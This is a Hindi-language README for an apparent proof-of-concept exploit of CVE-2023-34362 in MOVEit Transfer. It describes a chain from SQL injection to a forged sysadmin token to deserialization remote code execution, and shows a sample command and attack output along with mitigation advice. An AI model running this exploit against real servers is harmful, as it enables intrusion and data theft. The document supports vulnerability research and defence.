
CVE-2023-34362 को प्रभावित करने वाले MOVEit Transfer के लिए POC
CVE-2023-34362 के लिए POC जो MOVEit Transfer को प्रभावित करता है
इस कमजोरी का तकनीकी मूल कारण विश्लेषण ब्लॉग पर पाया जा सकता है:
यह POC एक SQL इंजेक्शन का दुरुपयोग करके sysadmin API एक्सेस टोकन प्राप्त करता है और फिर उस एक्सेस का उपयोग करके एक deserialization कॉल का दुरुपयोग करता है जिससे रिमोट कोड निष्पादन प्राप्त होता है।
इस POC को एक आइडेंटिटी प्रोवाइडर एंडपॉइंट तक पहुंचने की आवश्यकता है जो उचित RS256 प्रमाणपत्रों की मेजबानी करता है जो मनमाने उपयोगकर्ता टोकन बनाने के लिए उपयोग किए जाते हैं - डिफ़ॉल्ट रूप से यह POC AWS में होस्ट किए गए हमारे IDP एंडपॉइंट का उपयोग करता है।
यह एक्सप्लॉइट डिफ़ॉल्ट रूप से C:\Windows\Temp\message.txt पर एक फ़ाइल लिखेगा। वैकल्पिक पेलोड ysoserial.net प्रोजेक्ट का उपयोग करके उत्पन्न किए जा सकते हैं।
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
नवीनतम संस्करण में अपडेट करें या Progress Advisory में दिए गए निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग नहीं किया जाना चाहिए। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।